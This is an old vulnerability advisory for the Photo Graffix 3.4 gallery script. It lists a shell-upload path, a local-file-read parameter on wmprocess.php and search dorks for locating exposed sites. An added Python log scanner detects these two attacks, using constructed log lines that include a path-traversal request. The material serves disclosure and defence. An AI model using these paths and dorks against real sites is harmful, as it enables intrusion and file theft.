
# Title : Photo Graffix 3.4 Multiple Remote Vulnerabilities
# Published : 2009-04-08
# Author : ahmadbady


=-=-shell upload/local file-=-=

-=-=-=-=-=-=-=-=-=-=
script::Photo-GraffixV3.4.zip

Author: ahmadbady

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
download from: http://www.photo-graffix.com/V3/Photo-GraffixV3.4.zip

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
upload:
/path/mp3upload.htm ===> shell upload

shell = /path/music/shell.php
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
xpl:
/path/wmprocess.php?tdir=[open local file]
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
dork: "powered by Photo-Graffix Flash Image Gallery"
  "powered by Photo-Graffix"
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
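
Added example (not part of the original advisory): a log check a defender could run for the two issues listed above. It flags script files requested from the music/ upload directory and tdir values on wmprocess.php that leave a plain relative directory. The log lines are constructed, and the rule that legitimate tdir values are simple relative directory names is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Script extensions that have no place in an audio upload directory.
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar|pl|cgi|asp|aspx|jsp)$", re.I)
# Request field of a Common/Combined Log Format line.
REQUEST = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

def suspicious_tdir(value):
    """True if a decoded tdir value is not a plain relative directory name.
    Assumption: legitimate values are simple relative directory names."""
    v = value.replace("\\", "/")
    return (".." in v.split("/")                      # parent-directory segment
            or v.startswith("/")                      # absolute path
            or re.match(r"[A-Za-z]:", v) is not None  # Windows drive path
            or "\x00" in v                            # NUL byte in the value
            or "://" in v)                            # URL or stream wrapper

def classify(line):
    """Return the findings for one access-log line (empty list if clean)."""
    m = REQUEST.search(line)
    if not m:
        return []
    url = urlsplit(m.group("target"))
    path = unquote(url.path).lower()
    findings = []
    if path.endswith("/wmprocess.php"):
        # parse_qs percent-decodes, so ..%2F is compared as ../
        values = parse_qs(url.query, keep_blank_values=True).get("tdir", [])
        if any(suspicious_tdir(v) for v in values):
            findings.append("tdir-path-escape")
    if "/music/" in path and SCRIPT_EXT.search(path):
        findings.append("script-in-music-dir")
    return findings

def scan(lines):
    """Map 1-based line number -> findings, for lines with any finding."""
    hits = {n: classify(text) for n, text in enumerate(lines, 1)}
    return {n: f for n, f in hits.items() if f}

# Constructed sample log lines (documentation IP ranges, made-up paths).
SAMPLE_LOG = [
    '192.0.2.10 - - [08/Apr/2009:10:00:01 +0000] "GET /gallery/wmprocess.php?tdir=album1 HTTP/1.1" 200 512',
    '198.51.100.7 - - [08/Apr/2009:10:02:13 +0000] "GET /gallery/wmprocess.php?tdir=..%2F..%2Fconfig.php HTTP/1.1" 200 2048',
    '192.0.2.10 - - [08/Apr/2009:10:03:40 +0000] "GET /gallery/music/track01.mp3 HTTP/1.1" 200 400000',
    '198.51.100.7 - - [08/Apr/2009:10:05:02 +0000] "GET /gallery/music/x.php HTTP/1.1" 200 17',
]

if __name__ == "__main__":
    for lineno, findings in scan(SAMPLE_LOG).items():
        print(lineno, findings)
```

A hit on script-in-music-dir with a 200 response means an uploaded file was served as a script and the host should be treated as compromised until checked.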

# www.Syue.com [2009-04-08]